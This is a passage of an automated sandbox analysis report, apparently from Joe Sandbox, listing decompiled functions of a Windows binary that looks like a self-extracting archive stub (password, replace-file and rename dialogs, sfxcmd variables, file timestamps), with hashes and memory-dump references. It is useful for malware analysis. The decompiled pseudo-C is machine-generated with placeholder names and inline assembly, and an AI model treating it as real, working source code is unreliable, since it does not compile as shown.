Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370

EndDialog.USER32(?,00000001), ref: 00A4B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00A4B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00A4B304

Strings

GETPASSWORD1, xrefs: 00A4B289

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: bffd0b010bcb5e3bc9387f25389ebce8972c344ed2fea273072af4717c21fadd
Instruction ID: 61dd0084a4cc16a7366109332bf314344c66773ccf49fd30bc0a2c557353b517
Opcode Fuzzy Hash: bffd0b010bcb5e3bc9387f25389ebce8972c344ed2fea273072af4717c21fadd
Instruction Fuzzy Hash: CC11E136A10118BADF219FA49D49FFF377CEB89740F100021FA45B6084C7A0EA019771

Uniqueness

Uniqueness Score: -1.00%

Function 00A4DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4DCDD(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t15;
				int _t22;

				 *0xa8ec88 = _a12;
				 *0xa8ec8c = _a16;
				 *0xa78464 = _a20;
				if( *0xa78460 == 0) {
					if( *0xa78457 == 0) {
						_t15 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xa7102c, _t15,  *0xa78458, 0xa4c220, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xa71028, L"RENAMEDLG",  *0xa78450, 0xa4d600, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}

0x00a4dced
0x00a4dcf5
0x00a4dcfb
0x00a4dd00
0x00a4dd0d
0x00a4dd1c
0x00a4dd46
0x00a4dd5d
0x00a4dd62
0x00000000
0x00000000
0x00a4dd44
0x00000000
0x00000000
0x00a4dd44
0x00000000
0x00a4dd68
0x00000000
0x00a4dd11
0x00000000

Strings

REPLACEFILEDLG, xrefs: 00A4DD1C, 00A4DD50
RENAMEDLG, xrefs: 00A4DD31

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 6ac178a723e1b2c4f56af650f78d173f7ff626843d613eca6c06d57c6448237a
Instruction ID: bd50e7a6b1723230e65a84740c09a750ab9e0b4af4147caa52e3b8c1395671b3
Opcode Fuzzy Hash: 6ac178a723e1b2c4f56af650f78d173f7ff626843d613eca6c06d57c6448237a
Instruction Fuzzy Hash: 2901B17AE05245AFCB11CFE8FC0895A7BB8FB89354B004436F809C3230C7708892DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A4DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00A4DBDE(void* __eflags, WCHAR* _a4) {
				char _v8196;
				WCHAR* _t8;
				WCHAR* _t13;

				E00A4EC50(0x2000);
				SetEnvironmentVariableW(L"sfxcmd", _a4);
				_t8 = E00A40371(_a4,  &_v8196, 0x1000);
				_t13 = _t8;
				if(_t13 != 0) {
					_push( *_t13 & 0x0000ffff);
					while(E00A4048D() != 0) {
						_t13 =  &(_t13[1]);
						_push( *_t13 & 0x0000ffff);
					}
					return SetEnvironmentVariableW(L"sfxpar", _t13);
				}
				return _t8;
			}

0x00a4dbe6
0x00a4dbf4
0x00a4dc09
0x00a4dc0e
0x00a4dc12
0x00a4dc17
0x00a4dc21
0x00a4dc1a
0x00a4dc20
0x00a4dc20
0x00000000
0x00a4dc30
0x00a4dc38

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00A4DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A4DC30

Strings

sfxcmd, xrefs: 00A4DBEF
sfxpar, xrefs: 00A4DC2B

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 5746b82984350b7f00db143841392929000ae6ad2913f1e9d897f5443564e7ba
Instruction ID: a9e7f6840c309cb356ef3fe243d278dee9bf501937a8f0fc2ab8c5fc9cfe8bd1
Opcode Fuzzy Hash: 5746b82984350b7f00db143841392929000ae6ad2913f1e9d897f5443564e7ba
Instruction Fuzzy Hash: 85F0A7B680422476CF206FE58D46FAB3B68BF46781B040515FE8596051D6F08941D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A59A1E Relevance: 6.3, APIs: 4, Instructions: 305
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00A59A1E(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00A54636(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00A4EE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00A4EE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xa552a1
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00A4FFF0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00A4EE10( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00A62260();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00A62260();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00A62260();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00A59D21(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00A62430(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00A591A8();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00A59087();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x00a59a1e
0x00a59a29
0x00a59a30
0x00a59a32
0x00a59a32
0x00a59a34
0x00a59a3d
0x00a59a3f
0x00a59a44
0x00a59a4a
0x00a59a60
0x00a59a65
0x00a59a68
0x00a59a75
0x00a59a7a
0x00a59ace
0x00a59ad6
0x00a59ad8
0x00a59ada
0x00a59add
0x00a59add
0x00a59add
0x00a59ae3
0x00a59aeb
0x00a59afe
0x00a59b01
0x00a59b03
0x00a59b06
0x00a59b07
0x00a59b28
0x00a59b2b
0x00a59b2b
0x00a59b09
0x00a59b09
0x00a59b0b
0x00a59b16
0x00a59b16
0x00a59b18
0x00a59b1f
0x00a59b1a
0x00a59b1a
0x00a59b1a
0x00a59b18
0x00a59b2c
0x00a59b2e
0x00a59b2f
0x00a59b32
0x00a59b34
0x00a59b48
0x00a59b36
0x00a59b36
0x00a59b36
0x00a59b4d
0x00a59b4d
0x00a59b52
0x00a59b55
0x00a59b60
0x00a59b60
0x00a59b60
0x00a59b60
0x00a59b64
0x00a59b6b
0x00a59b6c
0x00a59b6f
0x00a59b72
0x00a59b72
0x00a59b74
0x00000000
0x00000000
0x00a59b8c
0x00a59b93
0x00a59b97
0x00a59b9a
0x00a59b9d
0x00a59b9f
0x00a59b9f
0x00a59b9f
0x00a59ba1
0x00a59ba4
0x00a59ba7
0x00a59ba9
0x00a59bb1
0x00a59bb7
0x00a59bba
0x00a59bbd
0x00a59bbe
0x00a59bc1
0x00a59bc4
0x00a59bc4
0x00a59bc9
0x00a59bcc
0x00000000
0x00000000
0x00a59be4
0x00a59be9
0x00a59bed
0x00000000
0x00000000
0x00a59bf1
0x00a59bf1
0x00a59bf4
0x00a59bf5
0x00a59bf5
0x00a59bf7
0x00a59bfa
0x00000000
0x00000000
0x00a59bfc
0x00a59bff
0x00a59c06
0x00a59c09
0x00a59c0c
0x00a59c22
0x00a59c22
0x00a59c22
0x00a59c0e
0x00a59c0e
0x00a59c10
0x00a59c13
0x00a59c1e
0x00a59c15
0x00a59c18
0x00a59c18
0x00a59c13
0x00000000
0x00a59c0c
0x00a59c01
0x00a59c01
0x00a59c03
0x00a59c03
0x00a59b57
0x00a59b57
0x00a59b5a
0x00a59c25
0x00a59c25
0x00a59c27
0x00a59c29
0x00a59c2c
0x00a59c2d
0x00a59c2e
0x00a59c2f
0x00a59c37
0x00a59c37
0x00a59c37
0x00a59c39
0x00a59c3c
0x00a59c3f
0x00a59c41
0x00a59c41
0x00a59c43
0x00a59c55
0x00a59c59
0x00a59c5c
0x00a59c63
0x00a59c6b
0x00a59c6b
0x00a59c6e
0x00a59c70
0x00a59c81
0x00a59c81
0x00a59c85
0x00a59c85
0x00a59c88
0x00a59c8a
0x00a59c8d
0x00000000
0x00a59c72
0x00a59c72
0x00a59c78
0x00a59c78
0x00a59c7c
0x00a59c8f
0x00a59c8f
0x00a59c93
0x00a59c94
0x00a59c96
0x00a59c98
0x00a59cd9
0x00a59cd9
0x00a59cdb
0x00a59ce8
0x00a59ce8
0x00a59cea
0x00a59cec
0x00a59ced
0x00a59cee
0x00a59cf5
0x00a59cf8
0x00a59cfa
0x00a59cfa
0x00a59cfb
0x00a59cfd
0x00a59d00
0x00a59d00
0x00a59d02
0x00a59d04
0x00000000
0x00a59d04
0x00a59cdd
0x00a59cdf
0x00000000
0x00000000
0x00a59ce1
0x00000000
0x00000000
0x00a59ce3
0x00a59ce6
0x00000000
0x00000000
0x00000000
0x00a59ce6
0x00a59c9f
0x00a59ca5
0x00a59ca5
0x00a59ca7
0x00a59ca8
0x00a59ca9
0x00a59caa
0x00a59cb1
0x00a59cb4
0x00a59cb6
0x00a59cb7
0x00a59cb9
0x00a59cc6
0x00a59cc6
0x00a59cc8
0x00a59cca
0x00a59ccb
0x00a59ccc
0x00a59cd3
0x00a59cd6
0x00a59cd8
0x00a59cd8
0x00000000
0x00a59cd8
0x00a59cbb
0x00a59cbb
0x00a59cbd
0x00000000
0x00000000
0x00a59cbf
0x00000000
0x00000000
0x00a59cc1
0x00a59cc4
0x00000000
0x00000000
0x00000000
0x00a59cc4
0x00a59ca1
0x00a59ca3
0x00000000
0x00000000
0x00000000
0x00a59ca3
0x00a59c74
0x00a59c76
0x00000000
0x00000000
0x00000000
0x00a59c76
0x00a59c70
0x00000000
0x00a59b5a
0x00a59b55
0x00a59a7c
0x00a59a7e
0x00000000
0x00a59a80
0x00a59a96
0x00a59a9b
0x00a59a9d
0x00a59aa9
0x00a59aaf
0x00a59ab0
0x00a59ab2
0x00a59ab4
0x00a59abf
0x00a59abf
0x00a59ac2
0x00a59ac4
0x00a59ac4
0x00a59ac7
0x00a59a9f
0x00a59a9f
0x00a59a9f
0x00000000
0x00a59a9d
0x00a59a4c
0x00a59a4c
0x00a59a53
0x00a59a54
0x00a59a56
0x00a59d08
0x00a59d0c
0x00a59d11
0x00a59d11
0x00a59d20
0x00a59d20

APIs

_strrchr.LIBCMT ref: 00A59AA9
__alldvrm.LIBCMT ref: 00A59CAA
__alldvrm.LIBCMT ref: 00A59CCC

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction ID: 0f28ac73749d30141b6ca684ca72cd901d91e2f9e5bb1548a9cd56a61ef89b5c
Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction Fuzzy Hash: E7A11272A04786DFEB21CF28C9917AFBBE5FF55311F28416DE9859F282C2388949C750

Uniqueness

Uniqueness Score: -1.00%

Function 00A3A354 Relevance: 6.1, APIs: 4, Instructions: 127
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00A3A354(void* __edx) {
				signed char _t41;
				void* _t42;
				void* _t53;
				signed char _t70;
				void* _t78;
				signed int* _t79;
				signed int* _t80;
				void* _t81;
				signed int* _t82;
				void* _t83;

				_t78 = __edx;
				E00A4EC50(0x1024);
				_t80 =  *(_t83 + 0x1038);
				_t70 = 1;
				if(_t80 == 0) {
					L2:
					 *(_t83 + 0x11) = 0;
					L3:
					_t79 =  *(_t83 + 0x1040);
					if(_t79 == 0) {
						L5:
						 *(_t83 + 0x13) = 0;
						L6:
						_t82 =  *(_t83 + 0x1044);
						if(_t82 == 0) {
							L8:
							 *(_t83 + 0x12) = 0;
							L9:
							_t41 = E00A3A243( *(_t83 + 0x1038));
							 *(_t83 + 0x18) = _t41;
							if(_t41 == 0xffffffff || (_t70 & _t41) == 0) {
								_t70 = 0;
							} else {
								E00A3A4ED( *((intOrPtr*)(_t83 + 0x103c)), 0);
							}
							_t42 = CreateFileW( *(_t83 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t83 + 0x14) = _t42;
							if(_t42 != 0xffffffff) {
								L16:
								if( *(_t83 + 0x11) != 0) {
									E00A4138A(_t80, _t78, _t83 + 0x1c);
								}
								if( *(_t83 + 0x13) != 0) {
									E00A4138A(_t79, _t78, _t83 + 0x2c);
								}
								if( *(_t83 + 0x12) != 0) {
									E00A4138A(_t82, _t78, _t83 + 0x24);
								}
								_t81 =  *(_t83 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t81,  ~( *(_t83 + 0x1b) & 0x000000ff) & _t83 + 0x00000030,  ~( *(_t83 + 0x16) & 0x000000ff) & _t83 + 0x00000024,  ~( *(_t83 + 0x11) & 0x000000ff) & _t83 + 0x0000001c);
								_t53 = CloseHandle(_t81);
								if(_t70 != 0) {
									_t53 = E00A3A4ED( *((intOrPtr*)(_t83 + 0x103c)),  *(_t83 + 0x18));
								}
								goto L24;
							} else {
								_t53 = E00A3BB03( *(_t83 + 0x1040), _t83 + 0x38, 0x800);
								if(_t53 == 0) {
									L24:
									return _t53;
								}
								_t53 = CreateFileW(_t83 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t83 + 0x14) = _t53;
								if(_t53 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t83 + 0x12) = _t70;
						if(( *_t82 | _t82[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t83 + 0x13) = _t70;
					if(( *_t79 | _t79[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t83 + 0x11) = 1;
				if(( *_t80 | _t80[1]) != 0) {
					goto L3;
				}
				goto L2;
			}

0x00a3a354
0x00a3a359
0x00a3a365
0x00a3a36c
0x00a3a370
0x00a3a37d
0x00a3a37d
0x00a3a381
0x00a3a381
0x00a3a38a
0x00a3a397
0x00a3a397
0x00a3a39b
0x00a3a39b
0x00a3a3a4
0x00a3a3b2
0x00a3a3b2
0x00a3a3b6
0x00a3a3bd
0x00a3a3c2
0x00a3a3c9
0x00a3a3df
0x00a3a3cf
0x00a3a3d8
0x00a3a3d8
0x00a3a3fa
0x00a3a400
0x00a3a407
0x00a3a451
0x00a3a456
0x00a3a45f
0x00a3a45f
0x00a3a469
0x00a3a472
0x00a3a472
0x00a3a47c
0x00a3a485
0x00a3a485
0x00a3a495
0x00a3a499
0x00a3a4a9
0x00a3a4b9
0x00a3a4bf
0x00a3a4c6
0x00a3a4ce
0x00a3a4db
0x00a3a4db
0x00000000
0x00a3a409
0x00a3a41a
0x00a3a421
0x00a3a4e4
0x00a3a4ea
0x00a3a4ea
0x00a3a43e
0x00a3a444
0x00a3a44b
0x00000000
0x00000000
0x00000000
0x00a3a44b
0x00a3a407
0x00a3a3ac
0x00a3a3b0
0x00000000
0x00000000
0x00000000
0x00a3a3b0
0x00a3a391
0x00a3a395
0x00000000
0x00000000
0x00000000
0x00a3a395
0x00a3a377
0x00a3a37b
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00A37F69,?,?,?), ref: 00A3A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00A37F69,?), ref: 00A3A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00A37F69,?,?,?,?,?,?,?), ref: 00A3A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00A37F69,?,?,?,?,?,?,?,?,?,?), ref: 00A3A4C6

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: da7aa8e9544385c9a64a7b87fe03329e482cc4ca12680e4586f063dc80aa697b
Instruction ID: 590ffb71f812c76e7d0c3c705dc0e60a1d80de81b79d42297e5705d582ece6f6
Opcode Fuzzy Hash: da7aa8e9544385c9a64a7b87fe03329e482cc4ca12680e4586f063dc80aa697b
Instruction Fuzzy Hash: 4941FD31288391AAE721DF24DC45FAEBBE8AFA0300F04091CF5E097180C6A4AA4CDB53

Uniqueness

Uniqueness Score: -1.00%

Function 00A31100 Relevance: 6.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00A31100(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v60;
				short* _v64;
				char* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v1114;
				char _v1116;
				void* __edi;
				signed int _t44;
				signed int _t52;
				intOrPtr _t67;
				short* _t80;
				void* _t83;
				char _t84;
				signed int _t85;
				void* _t87;
				signed int _t97;

				_t79 = _a16;
				_t81 =  &_v1116;
				if(_a16 != 0) {
					E00A40602( &_v1116, _t79, 0x200);
					_t87 =  &_v1114 + E00A53E13( &_v1116) * 2;
					E00A40602(_t87, _t79, 0x200 - (_t87 -  &_v1116 >> 1));
					_t81 = _t87 + E00A53E13(_t87) * 2 + 2;
				}
				E00A40602(_t81, E00A3E617(0xa3), 0x200 - (_t81 -  &_v1116 >> 1));
				_t83 = _t81 + E00A53E13(_t81) * 2 + 2;
				E00A40602(_t83, 0xa635f0, 0x200 - (_t83 -  &_v1116 >> 1));
				_t44 = E00A53E13(_t83);
				 *((short*)(_t83 + 2 + _t44 * 2)) = 0;
				_t84 = 0x58;
				E00A4FFF0(_t79,  &_v92, 0, _t84);
				_t67 = _a20;
				_t80 = _a12;
				_v88 = _a4;
				_v84 =  *0xa71028;
				_v80 =  &_v1116;
				_v44 = _a8;
				_v92 = _t84;
